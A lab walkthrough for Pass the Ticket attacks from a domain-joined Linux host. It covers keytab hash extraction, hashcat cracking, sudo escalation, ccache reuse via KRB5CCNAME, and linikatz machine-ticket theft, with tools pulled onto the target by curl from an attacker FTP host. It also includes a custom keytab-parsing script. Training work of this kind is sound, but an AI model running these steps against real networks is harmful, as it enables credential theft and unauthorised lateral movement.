# Questions

## Pass the Ticket (PtT) from Linux — Lab Walkthrough

### Overview

On **Windows**, tickets live in LSASS memory and are usually exported and imported as `.kirbi` files.\
On **Linux**, tickets are usually stored on disk as **ccache** files (typically `/tmp/krb5cc_<uid>` or `/tmp/krb5cc_<uid>_<random>`), and long-term keys are stored in **keytab** files.

Linux-side attacks therefore rely on the native MIT Kerberos tools plus whatever keytabs and ccache files the host leaves readable.

| Tool or variable   | Purpose                                                               |
| ------------------ | --------------------------------------------------------------------- |
| `klist`            | View the current Kerberos ticket cache (`klist -k -t` lists a keytab) |
| `kinit`            | Request a TGT with a password, or with a keytab key via `-k -t`       |
| `KRB5CCNAME`       | Point the session at a specific ccache file                           |
| `keytabextract.py` | Parse keytab files and print the RC4 (NTLM) and AES keys they hold    |
| `linikatz.sh`      | Collect tickets, keytabs and SSSD cache data from a Linux host        |
| `realm list`       | Show AD enrollment details on Linux                                   |

***

### Full attack chain

```
SSH as David
    ↓
realm list
    ↓
Find carlos.keytab
    ↓
Extract NTLM hash → crack → su carlos
    ↓
crontab -l → find svc_workstations.kt
    ↓
Find svc_workstations._all.kt
    ↓
Extract NTLM hash → crack → SSH as svc_workstations
    ↓
sudo -l → sudo su → root
    ↓
Use Julio's ccache via KRB5CCNAME → smbclient → julio.txt
    ↓
Run linikatz → load LINUX01$ ticket → smbclient → linux01 flag
```

***

### Step 1 — Initial access as David

```bash
# Connect to the domain-joined Linux machine
ssh david@inlanefreight.htb@10.129.158.254 -p 2222

# Read the flag
cat ~/flag.txt
```

> **Why `user@domain@host`?**\
> The home directory paths seen later (`/home/carlos@inlanefreight.htb`) show that SSSD on this host uses fully qualified names, so the Linux account is literally `david@inlanefreight.htb`. The first `@` is part of the username and the second separates it from the host. A bare `david` would be looked up as a local account and fail.

***

### Step 2 — Enumerate domain enrollment

```bash
realm list
```

Focus on:

* The joined AD domain
* Permitted logon groups
* Users or groups worth targeting

> `realm` comes from the `realmd` package and shows how the Linux host is joined to AD.

***

### Step 3 — Find readable keytab files

```bash
# Search for keytab files
find / -name '*keytab*' -ls 2>/dev/null
```

Example permission output:

```
-rw-------  root  root  /etc/krb5.keytab
-rw-rw-rw-  root  root  /opt/specialfiles/carlos.keytab
```

`/etc/krb5.keytab` is root-only; it holds the host's own keys.\
`carlos.keytab` is world-readable, so any local user can use it.

> A readable keytab is a credential, not just a lead.\
> It stores one or more principals together with their long-term keys (the keys derived from the account password, stored in the clear), so `kinit -k -t <keytab> <principal>` yields a TGT for that account without any password. Cracking is only needed when you want the plaintext itself, for example for an SSH login.

***

### Step 4 — Extract, crack, and switch to Carlos

#### 4a. Set up `keytabextract.py` on the attacker machine

```bash
git clone https://github.com/sosdave/KeyTabExtract
cd KeyTabExtract
sudo python3 -m pyftpdlib --port 21
```

#### 4b. Pull the tool onto the target

```bash
curl -o keytabextract.py ftp://10.10.16.5/keytabextract.py
```

#### 4c. Extract the NTLM hash

```bash
python3 keytabextract.py /opt/specialfiles/carlos.keytab
```

Expected output:

```
REALM      : INLANEFREIGHT.HTB
PRINCIPAL  : carlos
NTLM HASH  : a738f92b3c08b424ec2d99589a9cce60
AES-256    : <hash>
```

#### 4d. Crack the hash

```bash
# -m 1000 = NTLM
# -a 0    = straight wordlist attack
hashcat -a 0 -m 1000 a738f92b3c08b424ec2d99589a9cce60 /usr/share/wordlists/rockyou.txt
```

Result:

```
Password5
```

#### 4e. Switch to Carlos and read the flag

```bash
su carlos@inlanefreight.htb
# Password: Password5

cd
cat flag.txt
```

***

### Step 5 — Pivot to `svc_workstations`

#### 5a. Check Carlos's crontab

```bash
crontab -l
```

Output:

```
*/5 * * * * /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
```

#### 5b. Read the script

```bash
cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
```

Output:

```bash
#!/bin/bash
kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k -no-pass
```

The script authenticates as `svc_workstations` with a keytab (`kinit -k -t`) and lists that account's share, so a second keytab is readable by Carlos. The same `kinit` line run from Carlos's shell already yields a TGT as `svc_workstations` with no cracking at all; the password is pursued below only because the lab's next flag sits behind an SSH login as that account. (Also note that the single-dash `-no-pass` in the script is not smbclient's `--no-pass` option; the short form is `-N`.)

#### 5c. Pull `keytabextract.py` into Carlos's session

```bash
curl -o keytabextract.py ftp://10.10.16.5/keytabextract.py
```

#### 5d. Try the first keytab

```bash
python3 keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
```

Result:

> No NTLM hash appears; the keytab holds only an AES-256 key.\
> AES keys are derived from the password with PBKDF2 and a per-principal salt, so they cannot be fed to hashcat's NTLM mode (`-m 1000`). The keytab is still a working credential for `kinit -k -t`.

#### 5e. Search for more `.kt` files

```bash
find / -name '*.kt*' -ls 2>/dev/null
```

This finds:

```
/home/carlos@inlanefreight.htb/.scripts/svc_workstations._all.kt
```

This version was generated with every encryption type the account supports, including RC4-HMAC.\
The RC4-HMAC Kerberos key is by definition the account's NT hash (MD4 of the UTF-16LE password), which is why the tool reports it as an NTLM hash and why hashcat mode 1000 applies.
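To see what `keytabextract.py` is doing under the hood, and to make the AES-only versus `_all.kt` decision from Steps 3 to 5e scriptable across many files, here is an added example (my own code, not the page's and not KeyTabExtract) that parses the MIT keytab v2 format directly. It builds its own sample keytabs; the only value taken from the page is carlos's NT hash, used as the RC4 key in the constructed file. The AES placeholder keys, the kvnos, the `triage` helper and its output shape are assumptions of the example.

```python
"""Keytab triage, added example (not the page's code and not KeyTabExtract).
Parses the MIT keytab v2 on-disk format (0x0502 header, big-endian) and
answers what Steps 3-5 decide by hand: which principals and enctypes a
keytab holds, and whether it contains an RC4-HMAC key, which is the NT
hash and therefore crackable with `hashcat -m 1000`. The sample keytabs
are constructed here; only carlos's RC4 key is the value the page reports."""
import struct
import sys

KEYTAB_V2 = b"\x05\x02"
RC4_HMAC = 23                      # RFC 4757: the RC4-HMAC key *is* the NT hash
ENCTYPE_NAMES = {1: "des-cbc-crc", 3: "des-cbc-md5", 16: "des3-cbc-sha1",
                 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96",
                 19: "aes128-cts-hmac-sha256-128", 20: "aes256-cts-hmac-sha384-192",
                 23: "arcfour-hmac"}


def _cstr(b: bytes) -> bytes:
    """counted_octet_string as keytabs use it: uint16 length + data."""
    return struct.pack(">H", len(b)) + b


def _read_cstr(data: bytes, pos: int):
    (n,) = struct.unpack_from(">H", data, pos)
    pos += 2
    return data[pos:pos + n], pos + n


def build_keytab(entries) -> bytes:
    """Write keytab v2 bytes from (principal, realm, kvno, enctype, key) tuples.
    Used only to construct sample input; the layout matches what ktutil writes."""
    out = bytearray(KEYTAB_V2)
    for principal, realm, kvno, enctype, key in entries:
        comps = principal.encode().split(b"/")
        body = struct.pack(">H", len(comps)) + _cstr(realm.encode())
        body += b"".join(_cstr(c) for c in comps)
        body += struct.pack(">IIB", 1, 0, kvno & 0xFF)  # name_type=NT-PRINCIPAL, timestamp, vno8
        body += struct.pack(">H", enctype) + _cstr(key)   # keyblock: enctype + key
        body += struct.pack(">I", kvno)                   # optional 32-bit kvno
        out += struct.pack(">i", len(body)) + body        # each entry is preceded by its int32 size
    return bytes(out)


def parse_keytab(data: bytes):
    """Return one dict per live entry: principal, realm, kvno, enctype, key (hex)."""
    if data[:2] != KEYTAB_V2:
        raise ValueError("not a v2 keytab (expected 0x0502 header)")
    pos, entries = 2, []
    while pos + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, pos)
        pos += 4
        if size < 0:                       # negative size marks a deleted entry: skip it
            pos += -size
            continue
        end = pos + size
        (ncomp,) = struct.unpack_from(">H", data, pos)
        realm, pos = _read_cstr(data, pos + 2)
        comps = []
        for _ in range(ncomp):
            c, pos = _read_cstr(data, pos)
            comps.append(c.decode())
        _name_type, _timestamp, vno8 = struct.unpack_from(">IIB", data, pos)
        (enctype,) = struct.unpack_from(">H", data, pos + 9)
        key, pos = _read_cstr(data, pos + 11)
        kvno = vno8
        if end - pos >= 4:                 # 32-bit kvno present; it overrides vno8
            (kvno,) = struct.unpack_from(">I", data, pos)
        pos = end
        entries.append({"principal": "/".join(comps), "realm": realm.decode(), "kvno": kvno,
                        "enctype": enctype, "enctype_name": ENCTYPE_NAMES.get(enctype, str(enctype)),
                        "key": key.hex()})
    return entries


def triage(data: bytes, principal: str):
    """List the enctypes stored for `principal`; return the NT hash (RC4 key) and a
    ready hashcat line if there is one. AES keys are PBKDF2(password, salt) outputs,
    so without RC4 there is nothing for -m 1000, but `kinit -k -t` still works."""
    mine = [e for e in parse_keytab(data) if e["principal"] == principal]
    nt = next((e["key"] for e in mine if e["enctype"] == RC4_HMAC), None)
    return {"enctypes": sorted(e["enctype_name"] for e in mine), "ntlm": nt,
            "hashcat": f"hashcat -a 0 -m 1000 {nt} /usr/share/wordlists/rockyou.txt" if nt else None}


# Constructed samples, not the lab's files; the AES keys are placeholders.
CARLOS_NT = bytes.fromhex("a738f92b3c08b424ec2d99589a9cce60")
CARLOS_KEYTAB = build_keytab([("carlos", "INLANEFREIGHT.HTB", 2, 18, bytes(range(32))),
                              ("carlos", "INLANEFREIGHT.HTB", 2, RC4_HMAC, CARLOS_NT)])
SVC_AES_ONLY_KEYTAB = build_keytab([("svc_workstations", "INLANEFREIGHT.HTB", 3, 18, bytes(32))])

if __name__ == "__main__":
    # usage: python3 keytab_triage.py /opt/specialfiles/carlos.keytab carlos
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f:
            print(triage(f.read(), sys.argv[2]))
    else:
        print(triage(CARLOS_KEYTAB, "carlos"))
        print(triage(SVC_AES_ONLY_KEYTAB, "svc_workstations"))
```

On the target itself, MIT's `klist -k -t -K <file>` prints the same principals, kvnos and raw keys with no extra tooling; the script earns its keep when you want the RC4 entry picked out and turned into a hashcat line in one step for several keytabs.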

#### 5f. Extract from `_all.kt`

```bash
python3 keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations._all.kt
```

Output:

```
REALM      : INLANEFREIGHT.HTB
PRINCIPAL  : svc_workstations
NTLM HASH  : 7247e8d4387e76996ff3f18a34316fdd
AES-256    : <hash>
```

#### 5g. Crack the hash

```bash
hashcat -a 0 -m 1000 7247e8d4387e76996ff3f18a34316fdd /usr/share/wordlists/rockyou.txt
```

#### 5h. SSH as `svc_workstations`

```bash
ssh svc_workstations@inlanefreight.htb@10.129.158.254 -p 2222
# Password: <cracked password>

cat ~/flag.txt
```

***

### Step 6 — Escalate to root

```bash
sudo -l
```

Output:

```
(ALL : ALL) NOPASSWD: ALL
```

This account has full passwordless sudo.

```bash
sudo su
cat /root/flag.txt
```

***

### Step 7 — Abuse Julio's ccache

#### 7a. List ccache files

```bash
ls -lah /tmp
```

Look for files named `krb5cc_*`. The number after the prefix is the UID of the user whose session created the cache (`id julio@inlanefreight.htb` confirms the owner), and only that user or root can read it, which is why this step comes after the escalation.

#### 7b. Load the first ccache and verify it

```bash
export KRB5CCNAME=/tmp/krb5cc_647401106_HRJDux
klist
```

`KRB5CCNAME` tells every Kerberos-aware tool which cache file to use (a bare path is treated as `FILE:`). Use an absolute path: a relative name is resolved against the current directory of whichever process reads the variable, so a later `cd` would silently switch you back to your own cache.

Result:

> This ticket is expired.

#### 7c. Try the expired ticket

```bash
smbclient //DC01/julio -k -N -c ls
```

`-k` makes smbclient authenticate from the Kerberos cache and `-N` suppresses the password prompt (on Samba 4.15 and later `-k` is deprecated in favour of `--use-kerberos=required`).

Result:

> The connection fails: an expired TGT cannot be used to obtain a service ticket for the DC, so the session is rejected.

#### 7d. Try the second ccache

```bash
export KRB5CCNAME=/tmp/krb5cc_647401106_y07zSl
klist
```

Result:

> This ticket is still valid.

#### 7e. Read Julio's flag

```bash
smbclient //DC01/julio -k -N
ls
get julio.txt
exit

cat julio.txt
```

Keep `-k` here as well: `-N` only suppresses the password prompt, it is `-k` (or `--use-kerberos=required`) that selects the ticket cache.

***

### Step 8 — Abuse the machine account ticket

#### Concept

Domain-joined Linux hosts hold a machine account (`LINUX01$` here) just as Windows hosts do. Its long-term keys live in `/etc/krb5.keytab`, and SSSD keeps the ticket cache it obtained with them under `/var/lib/sss/db/ccache_<REALM>`.

Both are readable only by root. Once you are root you can reuse that cache directly, or request a fresh TGT yourself with `kinit -k -t /etc/krb5.keytab 'LINUX01$@INLANEFREIGHT.HTB'` (`klist -k /etc/krb5.keytab` shows which principals the keytab holds); linikatz simply automates finding and collecting this material.\
Authenticating as the machine account exposes whatever shares or services the host itself has been granted, here the `linux01` share.

#### 8a. Get `linikatz` on the attacker machine

```bash
wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh
# port 21 is privileged, hence sudo
sudo python3 -m pyftpdlib -p 21
```

#### 8b. Pull it onto the target as root

```bash
curl -o linikatz.sh ftp://10.10.16.28/linikatz.sh
```

> Root is required because `/var/lib/sss/db/` is protected.

#### 8c. Run `linikatz`

```bash
chmod +x linikatz.sh
./linikatz.sh
```

linikatz walks the places where a Linux host stores Kerberos material (keytabs, `/tmp/krb5cc_*` caches, SSSD's database and cache under `/var/lib/sss/`), copies what it finds into a local output directory and prints the ticket caches and keytab principals it discovered, including the SSSD machine cache used in the next step. Execute permission is all the script needs; `chmod 777` would also let every other user on the host edit a script you are about to run as root.

#### 8d. Load the machine ticket

```bash
export KRB5CCNAME=/var/lib/sss/db/ccache_INLANEFREIGHT.HTB
klist
```

Expected principal:

```
LINUX01$@INLANEFREIGHT.HTB
```

#### 8e. Access the share and read the flag

```bash
smbclient //DC01/linux01 -k -N
ls
get flag.txt
exit

cat flag.txt
```

***

### Key concepts summary

| Concept           | Detail                                                                           |
| ----------------- | -------------------------------------------------------------------------------- |
| **Keytab file**   | Stores principals with their long-term keys; usable directly with `kinit -k -t`  |
| **ccache file**   | Stores active Kerberos tickets on disk (`/tmp/krb5cc_<uid>*` by default)         |
| **KRB5CCNAME**    | Switches the active ticket cache; use an absolute path                           |
| **`kinit -k -t`** | Requests a TGT with a keytab key instead of a password                           |
| **`_all.kt`**     | Includes RC4-HMAC, whose key is the NT hash, so hashcat `-m 1000` applies        |
| **AES-256 only**  | No NT hash to crack, but the keytab still authenticates via `kinit -k -t`        |
| **SSSD ccache**   | Stores the machine account ticket under `/var/lib/sss/db/ccache_<REALM>`         |
| **linikatz**      | Collects Linux tickets and keytabs; needs root for SSSD's database               |

***

### Quick reference — all commands

```bash
# Initial access
ssh david@inlanefreight.htb@10.129.158.254 -p 2222
cat ~/flag.txt
realm list

# Find keytabs
find / -name '*keytab*' -ls 2>/dev/null
find / -name '*.kt*' -ls 2>/dev/null

# Attacker setup for KeyTabExtract
git clone https://github.com/sosdave/KeyTabExtract
cd KeyTabExtract
sudo python3 -m pyftpdlib --port 21

# Pull tool onto target
curl -o keytabextract.py ftp://10.10.16.5/keytabextract.py

# Extract hashes
python3 keytabextract.py /opt/specialfiles/carlos.keytab
python3 keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
python3 keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations._all.kt

# Crack NTLM
hashcat -a 0 -m 1000 a738f92b3c08b424ec2d99589a9cce60 /usr/share/wordlists/rockyou.txt
hashcat -a 0 -m 1000 7247e8d4387e76996ff3f18a34316fdd /usr/share/wordlists/rockyou.txt

# Switch users
su carlos@inlanefreight.htb
ssh svc_workstations@inlanefreight.htb@10.129.158.254 -p 2222

# Privilege escalation
sudo -l
sudo su
cat /root/flag.txt

# Julio ccache abuse (as root)
ls -lah /tmp
export KRB5CCNAME=/tmp/krb5cc_647401106_HRJDux
klist
smbclient //DC01/julio -k -N -c ls            # fails: TGT expired
export KRB5CCNAME=/tmp/krb5cc_647401106_y07zSl
klist
smbclient //DC01/julio -k -N -c 'get julio.txt'
cat julio.txt

# Machine account ticket
wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh
sudo python3 -m pyftpdlib -p 21
curl -o linikatz.sh ftp://10.10.16.28/linikatz.sh
chmod +x linikatz.sh
./linikatz.sh
export KRB5CCNAME=/var/lib/sss/db/ccache_INLANEFREIGHT.HTB
klist
smbclient //DC01/linux01 -k -N -c 'get flag.txt'
cat flag.txt
```

